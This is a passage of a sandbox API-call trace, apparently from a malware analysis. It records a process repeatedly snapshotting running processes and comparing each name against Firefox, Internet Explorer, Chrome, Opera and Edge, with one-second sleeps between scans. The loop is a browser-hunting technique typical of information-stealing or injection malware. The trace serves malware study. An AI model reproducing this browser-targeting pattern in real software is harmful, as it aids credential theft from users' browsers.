lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0252.826] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0252.826] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0252.826] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0252.826] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.826] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0252.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0252.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0252.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0252.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0252.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.827] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0252.828] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0252.828] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0252.828] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0252.828] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0252.828] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.828] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0252.828] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0252.828] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0252.828] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0252.828] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0252.828] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.828] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0252.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0252.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0252.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0252.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0252.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.829] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0252.829] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0252.829] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0252.829] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0252.829] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0252.829] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.829] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0252.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0252.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0252.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0252.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0252.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.830] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0252.830] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0252.830] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0252.830] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0252.830] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0252.831] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.831] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0252.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0252.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0252.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0252.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0252.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.831] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0252.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0252.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0252.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0252.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0252.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0252.832] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0252.832] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0252.832] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0252.832] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0252.832] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.832] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0252.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0252.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0252.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0252.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0252.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0252.833] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0252.833] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0252.833] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0252.833] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0252.833] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.833] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0252.834] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0252.834] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0252.834] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0252.834] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0252.834] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.834] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.834] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0252.834] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0252.835] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0252.835] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0252.835] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.835] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.835] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.835] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.835] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.835] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.835] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.836] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0252.836] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0252.836] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0252.836] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0252.836] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.836] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0252.836] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0252.836] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0252.836] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0252.836] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.836] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.837] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0252.837] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0252.837] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0252.837] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0252.837] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.837] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.837] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.837] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.837] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.837] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0252.837] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.838] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0252.838] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0252.838] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0252.838] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0252.838] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.838] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.839] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0252.839] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0252.839] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0252.839] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0252.839] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0252.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.839] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.839] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.839] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.839] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0252.839] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.839] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0252.840] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.840] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.841] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0252.841] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0252.841] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0252.841] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0252.841] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0252.841] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0252.841] CloseHandle (hObject=0xe8) returned 1 [0252.842] Sleep (dwMilliseconds=0x3e8) [0253.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0253.877] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.877] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0253.877] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0253.877] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0253.877] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0253.877] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0253.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.878] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0253.878] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0253.878] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0253.878] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0253.878] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0253.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.878] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0253.878] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0253.878] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0253.878] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0253.878] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.879] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.879] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0253.879] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0253.879] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0253.879] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.880] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0253.880] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0253.880] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0253.880] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0253.880] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.880] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.880] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0253.880] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0253.880] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0253.880] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.881] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0253.881] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0253.881] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0253.881] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0253.881] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.881] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0253.881] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0253.881] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0253.881] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0253.881] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.882] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0253.882] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0253.882] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0253.882] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0253.882] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.882] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0253.882] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0253.882] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0253.882] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0253.883] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0253.883] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.883] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.893] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.893] lstrcmpiA 